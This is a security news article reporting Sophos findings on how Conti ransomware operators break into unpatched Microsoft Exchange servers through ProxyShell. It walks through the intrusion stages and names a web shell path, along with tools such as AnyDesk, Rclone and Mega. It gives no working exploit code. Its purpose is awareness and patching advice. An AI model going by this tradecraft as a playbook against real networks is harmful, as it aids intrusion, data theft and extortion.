Thursday, January 23, 2025
HomeCVE/vulnerabilityConti Ransomware Gang Hacking Microsoft Exchange Servers Using ProxyShell Exploits

Conti Ransomware Gang Hacking Microsoft Exchange Servers Using ProxyShell Exploits

Published on

SIEM as a Service

Follow Us on Google News

Researchers uncovered a new ongoing attack by Conti Ransomware Gang that utilized the ProxyShell to target the organization networks.

ProxySell is an exploit written to abuse the Microsoft Exchange vulnerabilities reported over the past months, also it was patched by Microsoft and released an update in May 2021 under patch Tuesday. 

Conti is one of the ruthless ransomware gangs, and The FBI reported that the gang was involved with more than 400 high-profile cyber attacks with demands as high as $25 million.

New ProxySell attack is employed by the Ransomware groups, and the same exploit was already utilized by the LockFile ransomware, now it is used by the Conit Ransomware.

Researchers from Sophos believe that the attackers have gained experience with the techniques, their dwell time before launching the final ransomware payload on target networks.

Also Conti ransomware gain access to the targeted network under a minute and set up a remote Web Shell. Following this, they installed a second web shell that acts as a backup.

30 min later, Attackers generate a complete list of computers deployed in the targeted network, domain controller, and domain admins.

To execute the commands, it takes an hour to obtain the credentials of the domain administrator accounts, in another 48 hours, they exfiltrated about 1 Terabyte of data, and finally, they deployed the Conti ransomware to every machine on the network within 48 hours.

Technical Analysis

A Chain of Microsoft exchange vulnerabilities(CVE-2021-34473CVE-2021-34523CVE-2021-31207) was fixed in the recent April, May Exchange Server cumulative update, which leads to the organization upgrade their exchange server.

But some of the organizations leaving the exchange server without applying the patch due to email downtime, and it leaves them to attackers who used to scan the vulnerable systems.

Once the attackers successfully entered into the network, attackers create a new mailbox for “administrator,” and placing a new role with the help of Microsoft Exchange “cmdlets that help them to execute the Shell commands remotely.

\\127.0.0.1\C$\inetpub\wwwroot\aspnet_client\aspnetclient_log.aspx

Later, the attackers create a web shell in the localhost address of the sever and execute a PowerShell script which is encoded in base64.

In the next stage, attack utilizing the encoded command to abuses Service Control Manager to execute a directory look-up on the directory where the web shell was dropped.

In the Reconnaissance Phase, attackers another PowerShell command to retrieving the list of domain computers from the text file and collect the information about the network configuration, domain administrators, users actively connected to the system, process ID of the Local Security Authority Subsystem Service. Sophos said.

Once they have collected the all necessary data, the attacker dropped an executable file (SVN.exe) and executed it on the system then establish a connection to the C2 server which is placed in Finland.

Once the initial stage of compromise was done, attackers stealing the credentials then began lateral movement using an existing domain administrator account that they had cracked. 

“That account was used to create an RDP connection from the Exchange server to another server. One minute later, the logs of that server show the domain admin account downloading and installing the AnyDesk remote desktop software as a service.”

Finally, attackers deployed the File copying utility called Rclone in multiple servers with the help of PowerShell file.

Later the date has been transferring to the Mega file-sharing service that includes addresses of remote drives and the username & password for that account.

Exactly 5th day since the intimal compromiseConti actors began deploying ransomware and start the encrypt the files.

“Four batch scripts (called 1help.bat, 2help.bat, 3help.bat, and 4help.bat) were run from four servers. The batch files repeatedly invoked the ransomware executable (x64.exe), with each iteration targeting specific drives on every Windows system on the network by their default file sharing names “

ProxyShell and other attacks on known Microsoft Exchange vulnerabilities are extremely high now. Organizations are recommended to update and patch servers on-premises Exchange Server as soon as is possible.

Here are the recently released updates with the patches for the Microsoft Exchange server.

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity and hacking news updates.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

GhostGPT – Jailbreaked ChatGPT that Creates Malware & Exploits

Artificial intelligence (AI) tools have revolutionized how we approach everyday tasks, but they also...

Tycoon 2FA Phishing Kit Using Specially Crafted Code to Evade Detection

The rapid evolution of Phishing-as-a-Service (PhaaS) platforms is reshaping the threat landscape, enabling attackers...

Nnice Ransomware Attacking Windows Systems With Advanced Encryption Techniques

CYFIRMA's Research and Advisory team has identified a new strain of ransomware labeled "Nnice,"...

Microsoft Unveils New Identity Secure Score Recommendations in General Availability

Microsoft has announced the general availability of 11 new Identity Secure Score recommendations in...

API Security Webinar

Free Webinar - DevSecOps Hacks

By embedding security into your CI/CD workflows, you can shift left, streamline your DevSecOps processes, and release secure applications faster—all while saving time and resources.

In this webinar, join Phani Deepak Akella ( VP of Marketing ) and Karthik Krishnamoorthy (CTO), Indusface as they explores best practices for integrating application security into your CI/CD workflows using tools like Jenkins and Jira.

Discussion points

Automate security scans as part of the CI/CD pipeline.
Get real-time, actionable insights into vulnerabilities.
Prioritize and track fixes directly in Jira, enhancing collaboration.
Reduce risks and costs by addressing vulnerabilities pre-production.

More like this

GhostGPT – Jailbreaked ChatGPT that Creates Malware & Exploits

Artificial intelligence (AI) tools have revolutionized how we approach everyday tasks, but they also...

Tycoon 2FA Phishing Kit Using Specially Crafted Code to Evade Detection

The rapid evolution of Phishing-as-a-Service (PhaaS) platforms is reshaping the threat landscape, enabling attackers...

Nnice Ransomware Attacking Windows Systems With Advanced Encryption Techniques

CYFIRMA's Research and Advisory team has identified a new strain of ransomware labeled "Nnice,"...